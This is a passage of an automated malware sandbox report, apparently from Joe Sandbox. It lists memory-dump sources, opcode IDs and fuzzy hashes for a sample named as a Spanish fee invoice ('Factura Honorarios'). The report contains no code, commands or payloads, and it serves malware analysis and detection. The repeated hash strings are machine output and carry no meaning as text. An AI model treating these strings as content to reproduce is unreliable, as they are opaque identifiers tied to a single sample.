                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 13eba32095ab881496f1495e87636b299fe5fcfe321837e10487a8f4c756bbe4
                                                                                                                                  • Instruction ID: 4b51eb0cd4b1e5128743d852d9a0f2dc7585c0abd7305f8ea8f4bc7cf33850a0
                                                                                                                                  • Opcode Fuzzy Hash: 13eba32095ab881496f1495e87636b299fe5fcfe321837e10487a8f4c756bbe4
                                                                                                                                  • Instruction Fuzzy Hash: 13D19E74E00218CFEB54DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f78ce22e842974ddb10225e48b3d4d2781855cb81c3de9a692d59c3d95bb0e87
                                                                                                                                  • Instruction ID: 7fea337a1d77b41550be3b800f98a2b5cafde12adf6633b25c4587c364fd7946
                                                                                                                                  • Opcode Fuzzy Hash: f78ce22e842974ddb10225e48b3d4d2781855cb81c3de9a692d59c3d95bb0e87
                                                                                                                                  • Instruction Fuzzy Hash: 58D19D78E003188FEB55DFA9C980B9DBBB2AF89300F1081A9D809BB355DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a7e4768ddea803476ae435543726c8c568ec061dee530feb288f23d6129ad651
                                                                                                                                  • Instruction ID: 70cde09cfc07e999eb65b96631dbcd9606d7595e9e61f8a9629c77cc1ffff9b1
                                                                                                                                  • Opcode Fuzzy Hash: a7e4768ddea803476ae435543726c8c568ec061dee530feb288f23d6129ad651
                                                                                                                                  • Instruction Fuzzy Hash: BAD19D78E002188FEB55DFA9C990B9DBBB2BF89304F1081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 94af65a7347d119286c302f8ede999f6f946c3fe6b880cce897b8966cb4353db
                                                                                                                                  • Instruction ID: 0dc9fa87af3898dc7797d59e8d5e67f1b90e9e96a660345a49544eab1907b207
                                                                                                                                  • Opcode Fuzzy Hash: 94af65a7347d119286c302f8ede999f6f946c3fe6b880cce897b8966cb4353db
                                                                                                                                  • Instruction Fuzzy Hash: 53D19C78E00218CFEB55DFA9C990B9DBBB2AF89300F5081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction ID: da4e79aca4f04bb42ebfe43ceed09f8240db7a8031482cd1b34ba100e0d1f343
                                                                                                                                  • Opcode Fuzzy Hash: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction Fuzzy Hash: 01D19E78E002188FEB54CFA9C940B9DBBB2AF89300F1081A9D909BB364DB315D81DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec591a9a6713f29ef72e53ed80eb1c57d670d52f674ec10c1eb7080ec56348cb
                                                                                                                                  • Instruction ID: 659063ec8f62a8a533bff905d890b54dc1c21e9a274099f66d575ff2cbf78bad
                                                                                                                                  • Opcode Fuzzy Hash: ec591a9a6713f29ef72e53ed80eb1c57d670d52f674ec10c1eb7080ec56348cb
                                                                                                                                  • Instruction Fuzzy Hash: 04D19D78E002188FEB54DFA9C980B9DBBB2BF89300F1081A9D909BB354DB315A81DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c3862db68b0afcaad77ce33ca084b512e3ce58dbe40c1c1b6117838e71c0d43f
                                                                                                                                  • Instruction ID: f63306095adeb08cbd9aa3ef89affef4f8cb70fcc995ac1d40661ec2bbdd7ce8
                                                                                                                                  • Opcode Fuzzy Hash: c3862db68b0afcaad77ce33ca084b512e3ce58dbe40c1c1b6117838e71c0d43f
                                                                                                                                  • Instruction Fuzzy Hash: F9D19E78E002188FEB55DFA9C950B9DBBB2AF89300F1081A9D909BB354DB355D81DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 10d283343a5035f5211a4f97a4261b73621eb8f672abfde9a493988d0480497a
                                                                                                                                  • Instruction ID: f59620d49279a2e471e645a15c086bcff1d0b5420e5357625549facd8432470b
                                                                                                                                  • Opcode Fuzzy Hash: 10d283343a5035f5211a4f97a4261b73621eb8f672abfde9a493988d0480497a
                                                                                                                                  • Instruction Fuzzy Hash: 52D19C78E003188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB354DB355982DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b603a4e2ec53eb797cf61764b8e589b13d252429d0e7fa048dfc40ee52f73dd3
                                                                                                                                  • Instruction ID: 431893a6879d5ca128b8d824cdf0ae299026cf6b05a7ae296548a52332f575b9
                                                                                                                                  • Opcode Fuzzy Hash: b603a4e2ec53eb797cf61764b8e589b13d252429d0e7fa048dfc40ee52f73dd3
                                                                                                                                  • Instruction Fuzzy Hash: 74D18D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB365DB315D81DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dd2e5537a49d2d5a53f73bcc7f6c1b7d7db88cffc8f53c79ecbc6bf11e30dea9
                                                                                                                                  • Instruction ID: 3a23055f1d9187503724a6f9c11513cb60279c799d7bc7671d3aaedb5b0b8f72
                                                                                                                                  • Opcode Fuzzy Hash: dd2e5537a49d2d5a53f73bcc7f6c1b7d7db88cffc8f53c79ecbc6bf11e30dea9
                                                                                                                                  • Instruction Fuzzy Hash: 91D18D78E002188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB355DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 713c93553970a490d86de0533423b33020dde685fcb27c257fc45d8592c7c95c
                                                                                                                                  • Instruction ID: 62cb7eb54b0787bc1da0921b286b9cdbaf2e618d84965506bd0ef70a5c57b464
                                                                                                                                  • Opcode Fuzzy Hash: 713c93553970a490d86de0533423b33020dde685fcb27c257fc45d8592c7c95c
                                                                                                                                  • Instruction Fuzzy Hash: BCD19D78E003188FEB54DFA9C980B9DBBB2AF89300F1081A9D909BB355DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 035a088b95266450008e638f0d3e9928e141c05b114e5a5ba72902c248646d53
                                                                                                                                  • Instruction ID: 30869572f06ede82da9e46145383e6484a833c205957307bfd9711ac97b1fcb9
                                                                                                                                  • Opcode Fuzzy Hash: 035a088b95266450008e638f0d3e9928e141c05b114e5a5ba72902c248646d53
                                                                                                                                  • Instruction Fuzzy Hash: 99D19D78E003188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB355DB315982DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b958a3c4fd742c5e8f9a5821f83596da524830e67e90a1e824e3f837ff7f976
                                                                                                                                  • Instruction ID: d93c3455f7e0fde9f32d1b387ea1caac066010bed738cc35186da6d49bc66125
                                                                                                                                  • Opcode Fuzzy Hash: 7b958a3c4fd742c5e8f9a5821f83596da524830e67e90a1e824e3f837ff7f976
                                                                                                                                  • Instruction Fuzzy Hash: EED19F78E002188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1f7165cbd07fc07b86f441d691868bccde0c5d7e304820dbe28f2abe6f8ee0f0
                                                                                                                                  • Instruction ID: 98e82fa3ac4a431f0f3c4efd1552ddeaabe3d6a2d0292c8af9f601eb161adfc4
                                                                                                                                  • Opcode Fuzzy Hash: 1f7165cbd07fc07b86f441d691868bccde0c5d7e304820dbe28f2abe6f8ee0f0
                                                                                                                                  • Instruction Fuzzy Hash: F3D19D78E002188FEB55DFA9C990B9DBBB2AF89300F5081A9D909BB354DB315982DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb81e7875413c2e2c0e998c8de7e13b327e38ce79f82e65deaf35b8fd77707d8
                                                                                                                                  • Instruction ID: 977ef6900a1238bb2f122b85f4f441b9c18767ad57280c5c5f00b3cddf55e215
                                                                                                                                  • Opcode Fuzzy Hash: cb81e7875413c2e2c0e998c8de7e13b327e38ce79f82e65deaf35b8fd77707d8
                                                                                                                                  • Instruction Fuzzy Hash: 6DD19D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 733cd802c61e71d2ec004c1d1a6ade487f9f6eef8e46afd0d06077fa3cfb624f
                                                                                                                                  • Instruction ID: 1eb702e847777bb8e943ac2fb8b6752e9348c1059b537f5c377248ac76d9ac77
                                                                                                                                  • Opcode Fuzzy Hash: 733cd802c61e71d2ec004c1d1a6ade487f9f6eef8e46afd0d06077fa3cfb624f
                                                                                                                                  • Instruction Fuzzy Hash: E0D19D78E002188FEB55DFA9C990B9DBBB2BF89300F5081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 43a17aaff92d8c0705a7964979d80aff4872c75c3c60d3130685ac6dad1fd33b
                                                                                                                                  • Instruction ID: 4509ea4f29518092274deee0d757c7660c41eba0a6660ba50e652ee0a71f9b84
                                                                                                                                  • Opcode Fuzzy Hash: 43a17aaff92d8c0705a7964979d80aff4872c75c3c60d3130685ac6dad1fd33b
                                                                                                                                  • Instruction Fuzzy Hash: CCD19D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 83e95097946ee8221ec8367a8f393b4d028382bfe28be3a53f09c2277edc314d
                                                                                                                                  • Instruction ID: ea2e1f4cdc1c461ed4c53f3d4b66f31c63d8bdfaced17e7786b2fc143222a023
                                                                                                                                  • Opcode Fuzzy Hash: 83e95097946ee8221ec8367a8f393b4d028382bfe28be3a53f09c2277edc314d
                                                                                                                                  • Instruction Fuzzy Hash: 41D19E78E002188FEB55DFA9C950B9DBBB2BF89300F5081A9D809BB354DB315E82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fd52e2332387d661c8fb1506fa7514d0930dc5a3bed6dcebd47e199d691a6ac4
                                                                                                                                  • Instruction ID: 7be11244a4f81d17235f16d440d5779eee0671b0d63298741b316e68640a0dd5
                                                                                                                                  • Opcode Fuzzy Hash: fd52e2332387d661c8fb1506fa7514d0930dc5a3bed6dcebd47e199d691a6ac4
                                                                                                                                  • Instruction Fuzzy Hash: 4DC1B074E01218CFEB14DFA9C954B9DBBB2BF89304F5081A9D809AB355DB349E82CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f842933c67ebabffcb24377d767e03a8d852ce9ee97d480ff0cd25baac8bc37e
                                                                                                                                  • Instruction ID: c6b1a5619be2dd0af337a3d90a0104801718281db01e8deb34907280934954dc
                                                                                                                                  • Opcode Fuzzy Hash: f842933c67ebabffcb24377d767e03a8d852ce9ee97d480ff0cd25baac8bc37e
                                                                                                                                  • Instruction Fuzzy Hash: F1C1A074E01218CFEB14DFA9C984B9DBBB2AF89304F5081A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ed273bc03929a16aa806ed6156209e37b7aba7d529135953447d0dfc83435ff1
                                                                                                                                  • Instruction ID: 43dcbfab52a7e19b7bb6b51c4947321e5a87f0ed8a6e7d03b4ef5ebb15fce7f8
                                                                                                                                  • Opcode Fuzzy Hash: ed273bc03929a16aa806ed6156209e37b7aba7d529135953447d0dfc83435ff1
                                                                                                                                  • Instruction Fuzzy Hash: 95C1B074E01218CFDB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB359E86CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 701b64520b3f06b2f9631f9884b089fb3bf65738aaa715c70e0f4f0aae5035c6
                                                                                                                                  • Instruction ID: 9bb9098e8454ca66f6aa682fc972ca461113fb7368c7a07cd9f370024dabb3a9
                                                                                                                                  • Opcode Fuzzy Hash: 701b64520b3f06b2f9631f9884b089fb3bf65738aaa715c70e0f4f0aae5035c6
                                                                                                                                  • Instruction Fuzzy Hash: 9CC1AE74E01218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7182c8d2deafe15e8ce9c2a05f070eb91b42e6a64c758ebfbf9a3b084e3ea2ea
                                                                                                                                  • Instruction ID: ac5946c1180adfaeb257b5d2323eee91d965f775231c4139acd685adf94356a5
                                                                                                                                  • Opcode Fuzzy Hash: 7182c8d2deafe15e8ce9c2a05f070eb91b42e6a64c758ebfbf9a3b084e3ea2ea
                                                                                                                                  • Instruction Fuzzy Hash: 43C1BF74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 81588b687ac7e9e45a96ea0eb092992e4da84e3d61150429f9d6ed3aeec3807d
                                                                                                                                  • Instruction ID: d3979ad6cead3083e1dafda6ad9bc00a72426acbe6d92e691e92eaa0cf88dee3
                                                                                                                                  • Opcode Fuzzy Hash: 81588b687ac7e9e45a96ea0eb092992e4da84e3d61150429f9d6ed3aeec3807d
                                                                                                                                  • Instruction Fuzzy Hash: 78C1BF74E00218CFEB14DFA9C944B9DBBB2AF89304F1081A9D809BB355DB349E82DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22d51762a738e7c7d903e2c8b2cf5309f75075d35b4adac5c7b5684a83613caa
                                                                                                                                  • Instruction ID: 0a97fb0af0af886e0f7009498e032d720e064ce93aa9981a5300c5fa16a25770
                                                                                                                                  • Opcode Fuzzy Hash: 22d51762a738e7c7d903e2c8b2cf5309f75075d35b4adac5c7b5684a83613caa
                                                                                                                                  • Instruction Fuzzy Hash: 39C1AE74E01218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a3c650c620a5e74ed9f6a1a8b0107ac3652e30f77f2691edb79b2eacee3e84d
                                                                                                                                  • Instruction ID: 46187e5c0e21895819c157806bdfd80f887cfe6b4b59044ac46b9bf6bad50075
                                                                                                                                  • Opcode Fuzzy Hash: 6a3c650c620a5e74ed9f6a1a8b0107ac3652e30f77f2691edb79b2eacee3e84d
                                                                                                                                  • Instruction Fuzzy Hash: 39C1BE74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E81DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d620b435eaf1e91d32eaef66ae53e80ba80cb5785e23cba205fc8246546789e4
                                                                                                                                  • Instruction ID: 0754057fd5943646a889fb3e90965f6cf7c31722d942d27a0d461714ba10880e
                                                                                                                                  • Opcode Fuzzy Hash: d620b435eaf1e91d32eaef66ae53e80ba80cb5785e23cba205fc8246546789e4
                                                                                                                                  • Instruction Fuzzy Hash: 49C1B174E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2acd1a6bd2264ca33cb2827095062d3b0a78819e491ce6c578d1d823afd34435
                                                                                                                                  • Instruction ID: 3f45bb7a4a75937aa254e008ee05dcbe424112d8607a926884c52037a7d93fa9
                                                                                                                                  • Opcode Fuzzy Hash: 2acd1a6bd2264ca33cb2827095062d3b0a78819e491ce6c578d1d823afd34435
                                                                                                                                  • Instruction Fuzzy Hash: F5C1BF74E01218CFEB54DFA9C944B9DBBB2BF89300F1081A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75bb3decc5b02dc808c223251a7cb057c51084400f20f7a144e08ef82d39f10f
                                                                                                                                  • Instruction ID: aeca3217693237d8bbe02cdde747599ec51549f86d9f292d5804abfcfdf837ab
                                                                                                                                  • Opcode Fuzzy Hash: 75bb3decc5b02dc808c223251a7cb057c51084400f20f7a144e08ef82d39f10f
                                                                                                                                  • Instruction Fuzzy Hash: 54C1AF74E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aad85cc682ec508fcf5125fb8ae59b4f33e852c333a2db94b480974f3ad6782b
                                                                                                                                  • Instruction ID: e26f0685469d8eb55741a8b3dd3abe2da6d3d308a847e12f21c521cafb2d0d30
                                                                                                                                  • Opcode Fuzzy Hash: aad85cc682ec508fcf5125fb8ae59b4f33e852c333a2db94b480974f3ad6782b
